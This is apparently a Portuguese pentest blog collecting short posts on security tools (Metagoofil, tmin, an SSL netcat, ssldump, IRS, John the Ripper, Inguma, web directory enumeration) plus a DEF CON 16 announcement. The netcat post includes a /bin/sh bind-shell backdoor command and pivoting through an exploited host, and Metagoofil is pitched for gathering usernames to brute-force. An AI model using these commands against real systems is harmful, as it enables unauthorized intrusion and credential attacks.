RootSecurity

Metagoofil é uma ferramenta para enumeração desenhada para extrair informações a partir do header de metadata de documentos públicos (pdf,doc,xls,ppt,odp,ods) disponíveis no site da rede alvo.

Após varrer o google a procura dos documentos específicados na command line ele irá gerar um html de saída com os resultados do metadata estraído, listando Potenciais Usernames que serão muito úteis para preparar um Brute-Force attack em serviços disponibilizados como por exemplo, pop3, ftp, web applications, vpn, etc. Além disto ele irá extrair também uma lista de PATHs que foram armazenados no Metada, com essa informação é possível o FingerPrint do sistema operacional alvo, nomes de redes, Shared Resources, etc.

Esta nova versão do metagoofil extrai também o MAC Address de documentos Microsoft Office. Agora você pode ter uma idéia do tipo de hardware que o OS alvo está utilizando.

Todas estas informações não deveriam estar disponíveis na internet, porém a grande maioria das empresas não tem políticas para Information Leaking (Vazamento de Informações), isso sem falar que dessa grande maioria, 90% nem sabe que este tipo de informação realmente existe :P. Com isto você pode mostrar a elas quanta informação um atacante pode obter com uma técnica muito simples.

Como Funciona?

1- Em primeiro lugar o Metagoofil irá procurar no google por documentos públicos sobre determinada empresa. Exemplo, arquivos .PDF (Abaixo segue a Query para Google Hacking).

2- Ele faz download de todos os documentos encontrados para o disco e extrai os Metadata de todos eles, aplicando um filtro para capturar somente as informações realmente interessantes.

3- Exemplo de resultados extraídos por uma sesão de Metagoofil:

Exemplo de lista de Paths disponíveis extraídos do Metadata pelo Metagoofil:

Estando em posse de todos estes dados, você poderá preparer-se muito melhor para efetuar um pentest.

Download:

• MetaGooFil 1.4 - TAR - Released: 20/04/2008

Autor:

· Christian Martorella (Laramies)

http://www.edge-security.com/metagoofil.php

Good Hacking 4 All.

Tmin é um simples utilitário para facilitar a depuração de test cases complexos efetuados atraves de fuzzing. Ele é muito parecido com outra ferramenta deste tipo, delta, mas ele é melhor especialmente em caso de depurações de saídas desconhecidas, fora de padrão ou que o parse format seja difícil de lidar (sem a necessidade de utilizar tokens para re-serializar os dados), e por sua facil integração com UI externas para automatizar os testes.

Uma das features interessantes nele é a normalização alfabética para simplificar os test cases que não podem ser abreviados.

Exemplo de uso:

$ cat testcase.in

This is a lengthy and annoying hello world testcase.

$ cat testme.sh

#!/bin/bash

grep “el..*wo” || exit 0

exit 1

$ ../tmin -x ./testme.sh

tmin - complex testcase minimizer, version 0.03-beta (lcamtuf@google.com)

[*] Stage 0: loading ‘testcase.in’ and validating fault condition…

[*] Stage 1: recursive truncation (round 1, input = 53/53)

[*] Stage 1: recursive truncation (round 2, input = 27/53)

[*] Stage 1: recursive truncation (round 3, input = 14/53)

[*] Stage 1: recursive truncation (round 4, input = 10/53)

[*] Stage 1: recursive truncation (round 5, input = 8/53)

[*] Stage 1: recursive truncation (round 6, input = 7/53)

[*] Stage 2: block skipping (round 1, input = 7/53)

[*] Stage 2: block skipping (round 2, input = 6/53)

[*] Stage 2: block skipping (round 3, input = 5/53)

[*] Stage 3: alphabet normalization (round 1, charset = 5/5)

[*] Stage 3: alphabet normalization (round 2, charset = 5/5)

[*] Stage 4: character normalization (round 1, characters = 4/5)

[*] All done - writing output to ‘testcase.small’…

== Final statistics==

Original size : 53 bytes

Optimized size : 5 bytes (-90.57%)

Chars replaced : 1 (1.89%)

Efficiency : 9 good / 49 bad

Round counts : 1:6 2:3 3:2 4:1

$ cat testcase.small

el0wo

Detalhes

A ferramenta procura por um arquivo chamado testcase.in no mesmo diretório, e irá escrever um testcase.small minimo para aquele teste em especial. Para otimizar o test case para uma aplicação alvo, você pode simplesmente executar:

./tmin /path/to/program

Deste modo, tmin irá executar /path/to/program a cada ciclo, alimentando com o test case modificado o stdin do programa, e examinando a saída. O programa saindo com um sinal igual SIGSEGV será interpretado que o test case ainda esta funcionando. Você pode também utilizar –x command-line switch para modificar a lógica e tratar non-zero return codes como condições de erro.

non-zero return codes as fault conditions likewise, and -w file to save data to a specified location to be read by the tested application, instead of supplying it on stdin.

Para testes remotes, tmin suporta o –s command-line switch. Neste modo, o comportamento do programa especificado é ignorado e o tool espera por um sinal SIGUSR1 (clean execution) e SIGUSR2 (fault execution). Dois exemplos comuns são os abaixo:

./tmin -s -w local_file.txt /bin/true

./tmin -s nc 127.0.0.1 1234

Como mostrado acima, o nc será utilizado como um wrapper para a interação com o network service, e /bin/true será utilizado como um “decoy” enquanto o tmin escreve em arquivos locais.

Download:

Pode ser baixado aqui.

Todos já conhecem o que é o netcat (escrito por Hobbit em 1996), como usá-lo e que foi integrado nos sistemas UNIX a bastante tempo. Esta versão em Perl adiciona ao Netcat algumas possibilidades que o mesmo não tem. Por exemplo, suporte SSL, TCP e UDP Proxying e IPv4/IPv6 proxying.

Uso

SSL Capable NetCat 1.00

Usage: scnc [-options] target port

-c use SSL (default to not)

-a use SSL certificate authority file

-f use SSL certificate file (PEM format)

-k use SSL private key file (PEM format)

-t do telnet negociation (default to not)

-6 use IPv6 (default to not)

-e cmd command to execute

-l listen for connections (default to not)

-p port use local port number (default to random high)

-s address use address for bindings (default to all addresses)

-u use UDP socket (default to TCP)

-v be verbose (default to not)

-r host:port proxy connection to host:port

-r host:port:ipv6 proxy connection to host:port using IPv6

-r host:port::ssl proxy connection to host:port using SSL

-r host:port:ipv6:ssl proxy connection to host:port using IPv6 and SSL

Download

scnc

Exemplos de Uso

Protegendo conexões com túneis SSL

Você tem um servidor e um client (obviamente) que você controla. Você tem um serviço que não suporta SSL más você deseja estabelecer uma conexão SSL para evitar que em algum peer seja possível ler sua comunicação. A solução é criar um SSL tunnel (como se fosse o ssltunnel ou o stunnel).

• Server side (scnc irá escutar na porta 10000/TCP usando SSL e irá redirecionar o tráfego para localhost porta 110/TCP):

prompt$ scnc -vc -a ca.pem -f server.pem -k server-key.pem -p 10000 -r localhost:110

server: SSL listening on: 0.0.0.0:10000 (IPv4)

• Client side (scnc irá escutar em localhost porta 1110/TCP e irá redirecionar o tráfego para o servidor porta 10000/TCP usando SSL):

prompt$ scnc -v -s localhost -p 1110 -r server:10000::ssl

server: listening on: 127.0.0.1:1110 (IPv4)

Agora você pode utilizar seu client side application e usar o localhost e a porta 1110/TCP como endereço do servidor. Todo o tráfego irá ficar seguro por SSL.

Proxying SSL para acessar tráfego em Clear Text

Supomos que você está auditando um Web Server que suporta apenas HTTPS. Você deseja usar seu Sniffer Clássico ou uma ferramenta para Proxy (WebScarab/Paros). Você precisa remover a criptografia SSL para facilitar sua vida.

• Cliente side irá se tornar um SSL proxy (scnc irá escutar em localhost porta 1443/tcp e irá redirecionar o tráfego para o servidor que será auditado na porta 443/tcp usando SSL assim como os client Certificates):

prompt$ scnc -v -r audited-server:443::ssl -a ca.pem -f client.pem -k client-key.pem -s localhost -p 1443

server: listening on: 127.0.0.1:1443 (IPv4)

• Client side Exemplo:

prompt$ scnc -v localhost 1443

client: connected to: 127.0.0.1:1443 (IPv4)

GET / HTTP/1.0

HTTP/1.1 302 Found

Date: Thu, 27 Apr 2008 11:25:50 GMT

Server: Apache

…

Você agora pode usar sua ferramenta clássica de auditoria e usar o localhost com porta 1443/TCP como target server. Todo tráfego para localhost 1443/tcp será em Clear Text.

UDP proxying

Digamos que você tenha um server escutando na porta 31337/UDP, com uma backdoor de /bin/bash. Essa porta é filtrada por um firewall e você PRECISA usar alguma técnica de Port Forwarding porque o único IP Address permitido é o 192.168.10.200. Este IP address tem um serviço (uma aplicação Web escrita em PHP que permite você fazer upload e executar um comando). Isto poderia ser game over para este host, mas você não está interessado nele e quer apenas usar um caminho mais fácil. Você pode exploitar estar vulnerabilidade e primeiramente enviar o sncn, depois executa-lo com os parametros de proxying.

• Backdoored target (172.16.10.1:31337/UDP):

prompt$ scnc -vul -e /bin/sh -p 31337

server: listening on: 0.0.0.0:31337 (IPv4)

• Proxying host vulnerável (192.168.10.200:9000/UDP):

prompt$ scnc -vu -r 172.16.10.1:31337 -p 9000

server: listening on: 0.0.0.0:9000 (IPv4)

• Attacking host:

prompt$ scnc -vu 192.168.10.200 9000

client: connected to: 192.168.10.200:9000 (IPv4)

sh: turning off NDELAY mode

id

uid=1000(user) gid=1000(users) …

Você tem agora um tunnel UDP proxied e totalmente funcional. Se você tem um acesso TCP, claro que você usará TCP proxying.

Test SSL certificates

Se você deseja testar as features SSL, você pode baixar os seguintes certificados:

• CA certificate
• Server certificate
• Server key
• Client certificate
• Client key3

Espero que tenham gostado e Good Hacking 4 All.

SSLdump e um SSL/TLS network protocol analyzer. Ele analisa as conexões TCP na rede onde você está coletando o tráfego e tenta interpretar o tráfego SSL/TLS. Quando ele identifica o tráfego SSL/TLS, ele decodifica os pacotes gravados e depois mostra eles em forma de saída de texto no stdout.

Caso o atacante tenha uma copia dos certificados que estão sendo utilizados na comunicação, o ssldump consegue inclusive descriptografar as conexões e mostrar o data traffic da aplicação.

ssldump 0.9b3

A versão atual do ssldump é a 0.9b3

Download disponível aqui

Documentação Extra aqui.

Exemplos de utilização

ssldump -i le0 port 443

ssldump -i le0 port 443 and host romeo

ssldump -Ad -k ~/server.pem -p foobar -i le0 host romeo

Exemplo de saída

Abaixo segue um exemplo do trace gerado pelo ssldump.

New TCP connection #3: localhost(363  <-> localhost(4433)
3 1  0.0738 (0.073    C>S  Handshake      ClientHello
3 2  0.0743 (0.0004)  S>C  Handshake      ServerHello
3 3  0.0743 (0.0000)  S>C  Handshake      Certificate
3 4  0.0743 (0.0000)  S>C  Handshake      ServerHelloDone
3 5  0.0866 (0.0123)  C>S  Handshake      ClientKeyExchange
3 6  0.0866 (0.0000)  C>S  ChangeCipherSpec
3 7  0.0866 (0.0000)  C>S  Handshake      Finished
3 8  0.0909 (0.0043)  S>C  ChangeCipherSpec
3 9  0.0909 (0.0000)  S>C  Handshake      Finished
3 10 1.8652 (1.7742)  C>S  application_data
3 11 2.7539 (0.8887)  C>S  application_data
3 12 5.1861 (2.4321)  C>S  Alert          warning          close_notify
3    5.1868 (0.0007)  C>S  TCP FIN
 
3    5.1893 (0.0024)  S>C  TCP FIN

Este exemplo usa a flag para decodificação minima. SSLdump tem flags que permitem decodificar todas as mensagens, incluindo o application protocol data.

O SSLdump consegue descriptografar o tráfego entre 2 hosts se as seguintes condições ocorrem:

1. ssldump tem as chaves.
2. Static RSA foi usado.

1 5  0.4129 (0.1983)  C>S  Handshake      ClientKeyExchange
1 6  0.4129 (0.0000)  C>S  ChangeCipherSpec
1 7  0.4129 (0.0000)  C>S  Handshake
1 8  0.5585 (0.1456)  S>C  ChangeCipherSpec
1 9  0.6135 (0.0550)  S>C  Handshake
1 10 2.3121 (1.6986)  C>S  application_data
1 11 2.5336 (0.2214)  C>S  application_data
1 12 2.5545 (0.0209)  S>C  application_data
1 13 2.5592 (0.0046)  S>C  application_data
1 14 2.5592 (0.0000)  S>C  Alert

O SSLdump consegue trabalhar com SSLv1, SSLv2 e SSLv3 e TLS.

Espero que tenham gostado.

Good Hacking 4 All.

Muitas vezes uma das principais necessidades dentro de um pentest é publicar uma porta da rede interna para a internet a fim de facilitar o acesso de algum console SSH ou Terminal Service. Porém nem sempre é uma tarefa fácil encontrar hosts que tenham acesso permissivo para a internet.

Firewalls, Proxies e Content filters estão cada vez mais presentes em diversos segmentos de rede dificultando o que é conhecido como “Extrusion Attacks”.

Muitos mecanismos de Extrusion Detection vêm sendo implantados em pontos estratégicos da rede, para impedir que trojans, vírus e outros tipos de ameaças consigam evadir-se da rede, muitas vezes copiando informações sensíveis para hosts na internet, assim como também impedindo que funcionários (Insiders), possam muitas vezes cometer Espionagem Industrial fornecendo dados sigilosos à terceiros.

A implantação bem sucedida de um Filtro na camada de aplicação (Proxy) pode causar muitas dores de cabeça para um pentester que necessita publicar o acesso da rede interna na internet. Em muitos casos um bypass em cima de um filtro de Aplicação pode tornar-se complicado e uma ferramenta que irá ajudar muito em um cenário como este é o IRS (Ip Restrictions Scanner).

Desenvolvido pelos mesmos criadores do conhecido Cain & Abel (ferramenta com múltiplas funcionalidades), o IRS utiliza-se de diversas técnicas entre elas:

- Mac Address Spoofing

- Ip Spoofing

- Arp Tables Spoofing

- Half Scan

Ele atua de acordo com uma pequena configuração que deve ser feita apenas direcionando qual a interface de rede o mesmo deve utilizar. O IRS irá verificar qual a netmask utilizado pelo seu host e assim varrer todos os hosts que estão disponíveis neste segmento. Fazendo o IP Spoof ele envia uma solicitação SYN para o host externo e a porta que você colocou e fica aguardando o retorno de um pacote SYN/ACK. Assim ele mostra para você que este host consegue efetuar a comunicação que você tanto precisa.

Agora basta acessar este host (Estação de Administrador ou servidor) e fazer a publicação do acesso da forma que lhe for mais conveniente.

O IRS pode ser baixado aqui.

Esta versão pode ser utilizada no Windows 2000,Xp e 2003.

Antes de instala-lo deve-se tomar o cuidado de instalar a versão mais recente do pacote Winpcap que será necessário para a execução do IRS.

Maiores informações em http://oxid.it

Good Hacking 4 All.

Como todos sabem, John the ripper é um dos mais conhecidos e funcionais frameworks para auditoria em hashes e senhas de sistemas, sejam eles Unix ou Windows.

Nativamente o mesmo possui diversas funcionalidades e suporta os Algoritmos de criptografia utilizados na maioria dos sistemas disponibilizados pelo mercado. O john encontra-se atualmente na versão 1.7.2 e pode ser baixado aqui.

John the Ripper é muito rápido e atualmente está disponível para ser utilizado em muitos sabores de Unix (11 são oficialmente suportados, sem contar as diferentes arquiteturas), Windows, DOS, BeOS e OpenVMS.

O Propósito básico do uso do John é detectar passwords fracas que podem causar diversos problemas de segurança à sua infra-estrutura de rede.

Existem diversos patches disponíveis na internet de desenvolvedores que guiados pela necessidade de auditar diversos tipos de hashes diferentes, adicionaram funcionalidades ao John, acrescentando o suporte a muitos outros Hashes de aplicações e sistemas como por exemplo:

* O john mscash patch adiciona suporte para Cached Windows 2000/XP Domain Password Hashes. (mscash).

Abaixo segue uma tabela dos Hashes adicionais que podem ser suportados pelo John the Ripper utilizando alguns Patches que estão disponíveis.

(*) : Estes ciphers não foram testados e provavelmente não funcionam em arquitetura diferente da x86.

Abaixo estão as duas possibilidades de utilização dos patches para adicionar as funcionalidades, fica ao seu critério escolher qual é a forma mais interessante:

• O john bigpatch adiciona suporte para uma grande range de hashes ao John the Ripper. Este patch funciona com o John 1.6.38. Existem vários bugs conhecidos, é recomendado que se utilize a versão abaixo.
• O current tree, é a versão atual que funciona com todos os Hashes. Ele vem com o suporte de todos os Hashes acima e é so compilar e usar :).

Para quem não precisa utilizar nenhum Cipher diferente dos padrões, recomenda-se utilizar o John the Ripper diretamente do site do projeto Openwall.

Good Hacking 4 All.

Inguma é um open source penetration testing e vulnerability research toolkit escrito completamente em Python. O ambiente dele foi concebido principalmente para atacar sistemas relacionados com Oracle porém pode ser aplicado para diversos outros usos.

Uma vez que a capacidade de exploitação do Inguma é ainda muito limitada, ele conta com diversas ferramentas para Enumeração e Auditoria em hosts. Inguma continua sendo pesadamente desenvolvido então é sempre bom ficar atento pois novas releases podem sair rapidamente. No momento em que escrevo este post a current-version é a 0.0.7.2.

Inguma pode ser subdividido em 4 componentes principais:

1. Core and modules - Consiste na interface command line e os modulos para enumeração e auditoria, exploits e targets.

2. PyQT based GUI - Uma interface gráfica muito simples. Atualmente ela é mais uma idéia do que algo realmente usável.

3. Krash fuzzer - Um fuzzer para vários propósitos com muitos exemplos de pacotes.

4. OpenDis - Uma ferramenta para simplificar Assembly.

Como Inguma é um projeto open source, ele pode ser tão bom quanto a comunidade ajudar a ser. O Autor convida a todos para não somente no desenvolvimento como reportando bugs e contribuindo para o forum de discussão da comunidade e as mail-lists.

-> reporting bugs

-> community discussion

-> mailing list.

Usando o Inguma

O layout dos módulos do Inguma pode ser usados de forma sequencial. Este é um dos motivos pelo qual iremos ver primeiro os módulos de Discover.

Antes de continuar devo frizar que os módulos devem ser utilizados somente em sistemas que você tem permissão de utilizar como target. Auditar sistemas que você não é autorizado geralmente quebra várias Leis e pode colocar você em uma situação não muito agradável.

Dito isto vamos continuar.

Um dos módulos mais básicos e também mais funcionais é o portscan. Vamos executar um portscan na máquina target para checar.

One of the most basic and useful gather modules is portscan. Let’s run a portscan on the machine we wish to check.

inguma> target = “cobaia.net”
inguma> show options
inguma> scanType = “S”
Options

Target: cobaia.net
Port: 0
Covert level: 0
Timeout: 1
Wait time: 0.1
Wizard mode: False

Veja o uso do commando “show options”. Ele é útil no caso de você ter esquecido alguma coisa. Também setamos a variável scanType = “S”. Isso quer dizer que utilizaremos um scan utilizando pacotes SYN.

inguma> portscan
Portscan results

Port 80/www is opened at cobaia.net
Port 7777 is opened at cobaia.net
Port 8080/webcache is opened at cobaia.net
Port 21/ftp is opened at cobaia.net
Port 9090 is opened at cobaia.net

Agora que nós sabemos que portas estão abertas no nosso target, nós veremos um modulo de Discover chamado “isnated”. Isnated faz o que o nome sugeri, verifica que se a porta X está ou não atrás de um NAT.

inguma> port = 80
inguma> isnated
Port 80 is NOT NATed
inguma>

Identificamos que a porta 80 não está sob Nat Static, ou seja, é um servidor que está totalmente de frente para a internet, provavelmente sem firewalls na frente J. A próxima coisa a fazer agora é utilizar um módulo para pegar informações sobre o serviço que está sendo disponibilizado na porta 80. Para isto vamos utilizar o módulo chamado “identify”.

inguma> port = 80
inguma> identify
Port 80 : Apache/2.2.4 (Ubuntu) DAV/2 SVN/1.4.4 mod_perl/2.0.2 Perl/v5.8.8

Como podem ver, existem muitos módulos interessantes que podem ser utilizados durante um pentest e recomendo que todos sejam testados. Acredito que o Inguma será uma das grandes ferramentas de Penetration Testing Open Source assim como hoje o MetaSploit é.

Good Hacking 4 All.

Announcement: 4/11/2008

We are proud to announce the 16th annual Def Con.

If you are at all familiar with any of the previous Cons, then you will have a good idea of what DEF CON will be like. If you don’t have any experience with Cons, they are an event on the order of a pilgrimage to Mecca for the underground. They are a mind-blowing orgy of information exchange, viewpoints, speeches, education, enlightenment… And most of all sheer, unchecked PARTYING. It is an event that you must experience at least once in your lifetime.

The partying aside, it is a wonderful opportunity to met some of the luminaries of the underground computer scene and those that shape its destiny - the researchers, hackers, libertarians, and info-rebels of various kinds.

Most of all, there will be plenty of open-ended discussion on security, networks, and other topics as well as what TIME magazine calls the “Cyberpunk Movement”.

Las Vegas is, as you might have guessed, a great choice for the Con.

Gambling, loads of hotels and facilities, cheap air fare and room rates.

It’s also in the West Coast making it more available to a different crowd than the former Cons have been.

Your foray into the scene and your life will be forever incomplete if by some chance you miss out on DEF CON 16. Plan to be there!

WHO: You know who you are.

WHAT: Super Hacker Party Fest, with Speakers, contests, even live music.

WHERE: Las Vegas, Nevada

WHEN: August 8 - 10 (Fri, Sat, Sun) 2008

WHY: To meet all the other people out there you’ve been talking to for

months and months, and get some solid information instead of rumors.

DESCRIPTION:

So you’re bored, and have never gone to a convention? You want to meet all the other members of the so called ‘computer underground’? You’ve been calling BBS systems for a long time now, and you definitely have been interacting on the national networks. You’ve bullshitted with the best, and now it’s time to meet them in Vegas! For me I’ve been networking for years, and now I’ll get a chance to meet everyone in the flesh. Get together with a group of your friends and make the journey.

We cordially invite all hackers, phreaks, techno-rats, programmers, writers, activists, lawyers, philosophers, politicians, security officials, cyberpunks and all network sysops and users to attend.

DEF CON 16 will be over the weekend in the middle of down town Las Vegas at the Riviera Hotel. Why Las Vegas? Las Vegas is the place to do it.

Cheap food, alcohol, lots of entertainment and, like us, it never sleeps.

We will have the entire convention meeting space, so no sharing with the ‘norms’ this year. Events and speakers will be there to provide distraction and some actual information and experiences from this loosely knit community from lock picking, robot wars, the Black & White ball to the mystery box challenge and the premier Capture the Flag contest! See the site for an ever growing list of happenings.

This is an initial announcement. It is meant only to alert you to the time, dates and location of the convention. Future announcements will inform you about specific speakers and events.

An information pack is off of the internet at https://www.defcon.org/ The IP# is 216.231.40.180 Information updates will be posted there in the future as well as updated speaker lists.

CALL FOR PAPERS OPEN!

SPEAKERS: We want to solicit speakers from all aspects of the computer underground and associated culture (Law, Media, Software Companies, Cracking Groups, Hacking Groups, Magazine Editors, Etc.) If you or anyone you know of is interested in speaking on a self selected topic, please submit a CFP.

- From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We group presentations by subject and come up with topic areas, or “clusters” of interest. It worked out so well in the past we are doing it again.

What are we looking for then, if we don’t have tracks? Were looking for the presentation that you’ve never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn’t ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers (Lady Ada?), RFID zappers, and HERF madness. Got a MITM attack against cell phones or a way to duplicate fingerprints? (CCC?) We want to see it!

GET INVOLVED: There are many contests and groups to get involved with. If you don’t know anyone don’t phear, get involved. Join the forums, read up on the contests, plan a party, do something!

FOR MORE INFORMATION:

For initial comments, requests for more information, information about speaking at the event, or maps to the section where prostitution is legal outside Las Vegas (Just Kidding) Contact The Dark Tangent by leaving me mail at: dtangent@defcon.org on the InterNet.

Future information updates will pertain to the speaking agenda.

- —————————————————————————-

- –

Web Site

https://www.defcon.org/

Submit a CFP

https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html

Forums - Discuss and follow all the pre-conference planning https://forum.defcon.org/

Future Announcements in RSS format

https://www.defcon.org/defconrss.xml

The Jackal, holding the radio right behind Aleph One https://www.defcon.org/images/graphics/PICTURES/defcar1.jpg

Website directory enumeration é a combinação de métodos utilizados para conseguir listar os recursos de um determinado site. Não é surpresa que a enumeração de diretórios web seja uma clara evidência da fragilidade da segurança deste tipo de recurso, e é uma das principais formas de descobrir informações interessantes em um pentest.

Muitas vezes recursos que estão expostos fora da arvore de conteúdo principal muitas vezes acabam ficando visíveis para que usuários possam acessa-los, e na maioria das vezes sem que se tenha credenciais validas para se logar no sistema em questão e ter então acesso a estes dados. Abaixo vamos ver alguns métodos utilizados para enumerar este tipo de informação:

Enumeração via Brute Force pode jogar você em muitas direções diferentes que talves não sejam tão interessantes, porém existe várias formas mais interessantes de se implementar a mesma idéia.

Dicionário: Este conceito literalmente tenta todas as possibilidades de combinações de strings que são fornecidas para serem testadas contra o site. Funciona da mesma forma que um ataque de dicionário utilizado por um programa para quebrar senhas. Existe uma ferramenta chamada http-dir-enum, que pode ser baixada aqui e faz exatamente isto.

Common path’s and filenames: Esta técnica consiste em checar combinações de de paths e filenames que são comuns em webservers e que são conhecidos por conterem vulnerabilidades, como por exemplo alguns CGI scripts, determinadas strings PHP/ASP e etc. Este método é largamente utilizado por ferramentas que fazem Scan de Vulnerabilidades em Aplicações Web e servidores web, procurando por strings específicas que respondem a determinada vulnerabilidade. Existe um grande número de ferramentas que executa este tipo de ataque que podem ser baixadas aqui.

Spider emulation: Esta técnica simula a ação de um Search Engine Spider e sai vasculhando o site e visitando todo link que existe no index de todos os resources do site. Um Spider sabe onde ir utilizando o sitemap e os arquivos de robots que estão nos index. Você pode utilizar esta técnica usando o Wget e forjando um User-Agent:

wget -r –spider -l10 –wait 3 –random-wait -Uspiderpiggy -asomelog www.url.com

Falhas de Configuração: Websites ou a implementação errada de arquivos .htaccess comumente mostram uma listagem do conteúdo dos diretórios - alguns sites simplesmente não setam as ACLs para negar o acesso para usuários não autenticado no .htaccess permitindo que o conteúdo seja visualizado.

Certamente existem muitas outras formas de enumerar o conteúdo de um website e todas elas necessitam apenas de um pouco de criatividade e tempo. Good Hacking for all.